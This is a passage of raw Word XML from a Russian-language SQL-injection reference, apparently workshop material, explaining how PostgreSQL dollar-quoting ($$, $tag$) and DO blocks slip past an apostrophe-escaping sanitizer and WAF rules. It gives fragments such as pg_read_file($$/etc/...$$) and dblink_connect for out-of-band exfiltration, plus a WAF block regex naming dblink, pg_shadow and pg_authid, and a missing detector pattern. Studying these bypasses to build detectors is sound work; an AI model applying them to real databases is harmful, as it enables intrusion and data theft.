        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-разделённые команды разорвут на парс-ошибке, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>именно `DO ... $do$`-блок</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — отдельным запросом — может быть payload-ом, если точка инъекции допускает.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB246AB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$tag$...$tag$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (с тегом — здесь </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$do$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$conn$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) нужен, когда внутри dollar-quoted строки может встретиться другой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Здесь это используется одновременно для разных вложенностей: внешний </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$do$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для тела DO-блока, внутренний </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$conn$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для отдельных фрагментов conninfo-строки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754E1789" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Что в результате доходит до сервера</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE9E811" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>См. блоки «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что в результате доходит до сервера</w:t>
      </w:r>
      <w:r>
        <w:t>» внутри Payload A/B — после конкатенации и применения санитайзера/WAF на стороне приложения, PG видит синтаксически валидный SQL без следов апострофного фильтра.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B78B369" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Почему этот приём проходит фильтр</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408797D0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Sanitizer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>replace("'", "''")</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> оперирует только с символом </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Символ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не в его словаре — payload проходит без изменений.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD7EA25" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Count-based WAF-правило «нечётное количество </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">» — в payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> нет вовсе. Чётность тривиально соблюдается.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723E5046" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Pattern-based WAF из 3.9.0 здесь не помогает напрямую (его правила работают на ключевых словах и комбинациях </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'OR</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'AND</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dblink</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в payload оба триггерят). Для них нужны 3.9.2/3.9.5 (собрать имена функций из chr/decode).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9A8E88" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Почему PostgreSQL принимает результат как валидный SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535AD00C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dollar-quoting — официальная часть PG-лексики, введена в PG 8.0 для удобства написания plpgsql-функций (где </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> встречаются часто, классический </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-escape через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>''</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> становится нечитаемым).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEC31A0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$$...$$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — анонимный dollar-quote. Внутри — любые символы, включая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\n</w:t>
      </w:r>
      <w:r>
        <w:t>, без escaping.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4938BC16" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$tag$...$tag$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — dollar-quote с произвольным тегом (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tag</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — буквы/цифры/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, начинается с буквы). Используется, когда внутри строки может встретиться </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Можно вкладывать произвольно: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$a$ ... $b$ ... $b$ ... $a$</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20948697" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Парсер PG распознаёт открывающий </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$tag$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и ищет идентичный закрывающий — внутри ничего не интерпретируется. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>lexical</w:t>
      </w:r>
      <w:r>
        <w:t>-уровень, идёт до парсера выражений.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFC0639" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>•   Поведение стабильно с PG 8.0; синтаксис документирован в PostgreSQL Lexical Structure §4.1.2.4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B87C1D3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Версии</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5223A513" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL 8.0+ (все поддерживаемые)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — dollar-quoting есть в любой версии PG, встречающейся в проде.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C80B99F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Managed:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> работает везде идентично self-hosted. Парсер тот же.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315DDBEF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Связанные паттерны</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CB2B20" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.5 (stacked queries)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Payload B (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DO $$ ... END $$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — это альтернатива stacked для драйверов в extended-protocol. Атака превращается из «несколько команд через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t>» в «одна команда с plpgsql-программой внутри».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25425985" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.6.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dblink_connect(...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с conninfo, где </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$conn$...$conn$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> вместо </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'...'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — наиболее частый сценарий 3.9.1 в реальной OOB-атаке.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D71168F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.6.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres_fdw</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в DO-блоке — см. 3.6.2, там основной payload как раз через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DO $$ ... END $$;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (это закреплённый стандарт для postgres_fdw-атаки).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767B6495" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.6.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_file($$/etc/...$$)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — apostrophe-escape sanitizer обходится за счёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$$</w:t>
      </w:r>
      <w:r>
        <w:t>-литерала пути.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CE930C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Identifier injection в plpgsql. Внутри функций dollar-quoting тоже часто используется — те же приёмы применимы внутри </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prosrc</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEC3B5A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>rules.py в DS-workshop2.0 — не покрыто:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> регекса на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\$[a-zA-Z_]*\$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (детектор dollar-quote) в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>app/services/judge/rules.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> нет. Регекс </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>py_concat</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format_string</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ловит сам факт конкатенации, но не маркирует dollar-quoted как обходящий sanitizer.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1AADDF9D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Источники</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B683D83" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: Lexical Structure — Dollar-Quoted String Constants</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — R5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090C9C44" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: DO statement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D38FBB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: PL/pgSQL — Anonymous Code Blocks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263DC729" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PortSwigger Web Security Academy: SQL injection cheat sheet — PostgreSQL string constants</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0E3BA6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>HackTricks: PostgreSQL Injection — dollar-quoted strings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C131B48" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>OWASP: SQL Injection Bypassing WAF — alternative string literals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640A7A09" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.9.2 chr() + конкатенация</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F8A628" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код — см. 3.9.0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0AFBCF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что блокирует фильтр.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Из WAF 3.9.0 этот приём напрямую обходит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666B25A4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\b(dblink|pg_read|pg_authid|pg_shadow|pg_sleep)\w*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — функции/каталоги по подстроке.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378FEA08" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
